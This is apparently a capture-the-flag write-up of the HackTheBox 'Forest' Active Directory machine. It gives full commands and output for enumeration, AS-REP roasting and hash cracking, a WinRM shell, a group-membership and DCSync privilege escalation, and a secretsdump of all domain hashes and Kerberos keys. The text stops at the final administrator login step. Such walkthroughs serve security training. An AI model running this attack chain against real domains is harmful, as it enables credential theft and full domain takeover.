Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
| # Nmap 7.95 scan initiated Sat May 24 12:17:08 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up, received echo-reply ttl 127 (0.061s latency).
Scanned at 2025-05-24 12:17:08 CDT for 27s
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-24 09:03:19Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -5h53m54s, deviation: 4h02m31s, median: -8h13m55s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 2 (port 16481/tcp): CLEAN (Couldn't connect)
| Check 3 (port 44587/udp): CLEAN (Timeout)
| Check 4 (port 35687/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-time:
| date: 2025-05-24T09:03:27
|_ start_date: 2025-05-24T09:01:18
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2025-05-24T02:03:29-07:00
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 24 12:17:35 2025 -- 1 IP address (1 host up) scanned in 27.48 seconds
|
LDAP Enumeration
Users Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec ldap 10.10.10.161 -u '' -p '' --users
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.161 389 FOREST [+] htb.local\:
LDAP 10.10.10.161 389 FOREST [*] Total of records returned 34
LDAP 10.10.10.161 389 FOREST Administrator Built-in account for administering the computer/domain
LDAP 10.10.10.161 389 FOREST Guest Built-in account for guest access to the computer/domain
LDAP 10.10.10.161 389 FOREST DefaultAccount A user account managed by the system.
LDAP 10.10.10.161 389 FOREST krbtgt Key Distribution Center Service Account
LDAP 10.10.10.161 389 FOREST $331000-VK4ADACQNUCA
LDAP 10.10.10.161 389 FOREST SM_2c8eef0a09b545acb
LDAP 10.10.10.161 389 FOREST SM_ca8c2ed5bdab4dc9b
LDAP 10.10.10.161 389 FOREST SM_75a538d3025e4db9a
LDAP 10.10.10.161 389 FOREST SM_681f53d4942840e18
LDAP 10.10.10.161 389 FOREST SM_1b41c9286325456bb
LDAP 10.10.10.161 389 FOREST SM_9b69f1b9d2cc45549
LDAP 10.10.10.161 389 FOREST SM_7c96b981967141ebb
LDAP 10.10.10.161 389 FOREST SM_c75ee099d0a64c91b
LDAP 10.10.10.161 389 FOREST SM_1ffab36a2f5f479cb
LDAP 10.10.10.161 389 FOREST HealthMailboxc3d7722
LDAP 10.10.10.161 389 FOREST HealthMailboxfc9daad
LDAP 10.10.10.161 389 FOREST HealthMailboxc0a90c9
LDAP 10.10.10.161 389 FOREST HealthMailbox670628e
LDAP 10.10.10.161 389 FOREST HealthMailbox968e74d
LDAP 10.10.10.161 389 FOREST HealthMailbox6ded678
LDAP 10.10.10.161 389 FOREST HealthMailbox83d6781
LDAP 10.10.10.161 389 FOREST HealthMailboxfd87238
LDAP 10.10.10.161 389 FOREST HealthMailboxb01ac64
LDAP 10.10.10.161 389 FOREST HealthMailbox7108a4e
LDAP 10.10.10.161 389 FOREST HealthMailbox0659cc1
LDAP 10.10.10.161 389 FOREST sebastien
LDAP 10.10.10.161 389 FOREST lucinda
LDAP 10.10.10.161 389 FOREST svc-alfresco
LDAP 10.10.10.161 389 FOREST andy
LDAP 10.10.10.161 389 FOREST mark
LDAP 10.10.10.161 389 FOREST santi
|
Group Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec ldap 10.10.10.161 -u '' -p '' --groups
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP 10.10.10.161 389 FOREST [+] htb.local\:
LDAP 10.10.10.161 389 FOREST Administrators
LDAP 10.10.10.161 389 FOREST Users
LDAP 10.10.10.161 389 FOREST Guests
LDAP 10.10.10.161 389 FOREST Print Operators
LDAP 10.10.10.161 389 FOREST Backup Operators
LDAP 10.10.10.161 389 FOREST Replicator
LDAP 10.10.10.161 389 FOREST Remote Desktop Users
LDAP 10.10.10.161 389 FOREST Network Configuration Operators
LDAP 10.10.10.161 389 FOREST Performance Monitor Users
LDAP 10.10.10.161 389 FOREST Performance Log Users
LDAP 10.10.10.161 389 FOREST Distributed COM Users
LDAP 10.10.10.161 389 FOREST IIS_IUSRS
LDAP 10.10.10.161 389 FOREST Cryptographic Operators
LDAP 10.10.10.161 389 FOREST Event Log Readers
LDAP 10.10.10.161 389 FOREST Certificate Service DCOM Access
LDAP 10.10.10.161 389 FOREST RDS Remote Access Servers
LDAP 10.10.10.161 389 FOREST RDS Endpoint Servers
LDAP 10.10.10.161 389 FOREST RDS Management Servers
LDAP 10.10.10.161 389 FOREST Hyper-V Administrators
LDAP 10.10.10.161 389 FOREST Access Control Assistance Operators
LDAP 10.10.10.161 389 FOREST Remote Management Users
LDAP 10.10.10.161 389 FOREST System Managed Accounts Group
LDAP 10.10.10.161 389 FOREST Storage Replica Administrators
LDAP 10.10.10.161 389 FOREST Domain Computers
LDAP 10.10.10.161 389 FOREST Domain Controllers
LDAP 10.10.10.161 389 FOREST Schema Admins
LDAP 10.10.10.161 389 FOREST Enterprise Admins
LDAP 10.10.10.161 389 FOREST Cert Publishers
LDAP 10.10.10.161 389 FOREST Domain Admins
LDAP 10.10.10.161 389 FOREST Domain Users
LDAP 10.10.10.161 389 FOREST Domain Guests
LDAP 10.10.10.161 389 FOREST Group Policy Creator Owners
LDAP 10.10.10.161 389 FOREST RAS and IAS Servers
LDAP 10.10.10.161 389 FOREST Server Operators
LDAP 10.10.10.161 389 FOREST Account Operators
LDAP 10.10.10.161 389 FOREST Pre-Windows 2000 Compatible Access
LDAP 10.10.10.161 389 FOREST Incoming Forest Trust Builders
LDAP 10.10.10.161 389 FOREST Windows Authorization Access Group
LDAP 10.10.10.161 389 FOREST Terminal Server License Servers
LDAP 10.10.10.161 389 FOREST Allowed RODC Password Replication Group
LDAP 10.10.10.161 389 FOREST Denied RODC Password Replication Group
LDAP 10.10.10.161 389 FOREST Read-only Domain Controllers
LDAP 10.10.10.161 389 FOREST Enterprise Read-only Domain Controllers
LDAP 10.10.10.161 389 FOREST Cloneable Domain Controllers
LDAP 10.10.10.161 389 FOREST Protected Users
LDAP 10.10.10.161 389 FOREST Key Admins
LDAP 10.10.10.161 389 FOREST Enterprise Key Admins
LDAP 10.10.10.161 389 FOREST DnsAdmins
LDAP 10.10.10.161 389 FOREST DnsUpdateProxy
LDAP 10.10.10.161 389 FOREST Organization Management
LDAP 10.10.10.161 389 FOREST Recipient Management
LDAP 10.10.10.161 389 FOREST View-Only Organization Management
LDAP 10.10.10.161 389 FOREST Public Folder Management
LDAP 10.10.10.161 389 FOREST UM Management
LDAP 10.10.10.161 389 FOREST Help Desk
LDAP 10.10.10.161 389 FOREST Records Management
LDAP 10.10.10.161 389 FOREST Discovery Management
LDAP 10.10.10.161 389 FOREST Server Management
LDAP 10.10.10.161 389 FOREST Delegated Setup
LDAP 10.10.10.161 389 FOREST Hygiene Management
LDAP 10.10.10.161 389 FOREST Compliance Management
LDAP 10.10.10.161 389 FOREST Security Reader
LDAP 10.10.10.161 389 FOREST Security Administrator
LDAP 10.10.10.161 389 FOREST Exchange Servers
LDAP 10.10.10.161 389 FOREST Exchange Trusted Subsystem
LDAP 10.10.10.161 389 FOREST Managed Availability Servers
LDAP 10.10.10.161 389 FOREST Exchange Windows Permissions
LDAP 10.10.10.161 389 FOREST ExchangeLegacyInterop
LDAP 10.10.10.161 389 FOREST Exchange Install Domain Servers
LDAP 10.10.10.161 389 FOREST Service Accounts
LDAP 10.10.10.161 389 FOREST Privileged IT Accounts
LDAP 10.10.10.161 389 FOREST test
|
AS-REP Roasting
1
2
3
4
5
6
7
8
9
10
11
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo impacket-GetNPUsers -request -dc-ip 10.10.10.161 htb.local/
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2025-05-24 04:16:30.231609 2019-09-23 06:09:47.931194 0x410200
$krb5asrep$23$svc-alfresco@HTB.LOCAL:1b8d21b25f5418adecf03a0be651c60d$f32dcfa90aa1510e5cb506e2be94bacbea6f156a1acbaaf65c08571d5d6a6fd2f50ccfbb2934b18a776a58497264985495abc4b67f50b34ea815ee0f5abd700d1956c205adc5e8c12db6feddf3fe96b3d6c38916c5d17a661badb348aa752e6c3bf165448a7530a6635993fdeab737a0e1180d13785ac14e5032f417e63ae284471c1e802ffc6341191890a0fcc3fa1963ff8b5a418ed4597d6e355e6a3543f833236f7bc818e717b1fa2d6c52a94b67a1b6689841b2e51d551e088295dc80c9a2721ab80529b5997e4aef9886a7b0e15f87b1f8cd54702232c5b0a2878eb20d9668cc6940b2
|
Try Cracking
1
2
3
4
5
6
7
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt --force
...
$krb5asrep$23$svc-alfresco@HTB.LOCAL:1b8d21b25f5418adecf03a0be651c60d$f32dcfa90aa1510e5cb506e2be94bacbea6f156a1acbaaf65c08571d5d6a6fd2f50ccfbb2934b18a776a58497264985495abc4b67f50b34ea815ee0f5abd700d1956c205adc5e8c12db6feddf3fe96b3d6c38916c5d17a661badb348aa752e6c3bf165448a7530a6635993fdeab737a0e1180d13785ac14e5032f417e63ae284471c1e802ffc6341191890a0fcc3fa1963ff8b5a418ed4597d6e355e6a3543f833236f7bc818e717b1fa2d6c52a94b67a1b6689841b2e51d551e088295dc80c9a2721ab80529b5997e4aef9886a7b0e15f87b1f8cd54702232c5b0a2878eb20d9668cc6940b2:s3rvice
...
|
Good! We got the credentials svc-alfresco:s3rvice.
SMB Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' --shares
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [+] Enumerated shares
SMB 10.10.10.161 445 FOREST Share Permissions Remark
SMB 10.10.10.161 445 FOREST ----- ----------- ------
SMB 10.10.10.161 445 FOREST ADMIN$ Remote Admin
SMB 10.10.10.161 445 FOREST C$ Default share
SMB 10.10.10.161 445 FOREST IPC$ Remote IPC
SMB 10.10.10.161 445 FOREST NETLOGON READ Logon server share
SMB 10.10.10.161 445 FOREST SYSVOL READ Logon server share
|
WinRM Enumeration
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
SMB 10.10.10.161 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP 10.10.10.161 5985 FOREST [*] http://10.10.10.161:5985/wsman
WINRM 10.10.10.161 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
|
1
2
3
4
5
6
7
8
9
10
11
12
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
|
Post Exploitation
Quick Check
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop>
|
1
2
3
4
5
6
7
8
9
10
| *Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
WinPEASx64
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| ÉÍÍÍÍÍÍÍÍÍ͹ Current TCP Listening Ports
È Check for services restricted from the outside
Enumerating IPv4 connections
Protocol Local Address Local Port Remote Address Remote Port State Process ID Process Name
TCP 0.0.0.0 88 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 135 0.0.0.0 0 Listening 812 svchost
TCP 0.0.0.0 389 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 445 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 464 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 593 0.0.0.0 0 Listening 812 svchost
TCP 0.0.0.0 636 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 3268 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 3269 0.0.0.0 0 Listening 584 lsass
TCP 0.0.0.0 5985 0.0.0.0 0 Listening 4 System
TCP 0.0.0.0 9389 0.0.0.0 0 Listening 1968 Microsoft.ActiveDirectory.WebServices
...
|
Bloodhound
Note that we are a member of ACCOUNT OPERATORS, which is a group that by default has privileges to create and modify most types of accounts, including accounts for users, Local groups, and Global groups.
This means we can add our credentials to groups.
Note that we still cannot join ourselves to DOMAIN ADMINS… REASON: TODO
Join to which groups?
By looking at this relationship, we can add ourselves to EXCHANGE WINDOWS PERMISSIONS, which then has WriteDACL on the domain, allowing us to grant ourselves DCSync privileges.
1
2
3
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ bloodyAD --host 10.10.10.161 -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' add groupMember "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco"
[+] svc-alfresco added to EXCHANGE WINDOWS PERMISSIONS
|
Then we follow the bloodhound guide to grant ourselves DCSync privileges.
Add DCSync Privileges
However, the bloodhound guide seems to be wrong (or old). By searching Google: https://www.thehacker.recipes/ad/movement/dacl/grant-rights
1
2
3
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ bloodyAD --host 10.10.10.161 -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' add dcsync "svc-alfresco"
[+] svc-alfresco is now able to DCSync
|
Exploit DCSync
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
└─$ sudo impacket-secretsdump "htb.local/svc-alfresco":"s3rvice"@10.10.10.161
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:e3fcfad73bfa8569bd3d181167a3cd4e:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
FOREST$:aes256-cts-hmac-sha1-96:be5b5087b4509c2615fd28c97e1602ab971da0fb3fa22a8685e81287ddee226e
FOREST$:aes128-cts-hmac-sha1-96:b3b73050ae4f033b7b596035c52274c1
FOREST$:des-cbc-md5:02ea9b62fde54038
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
|
Login as administrator
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/forest]
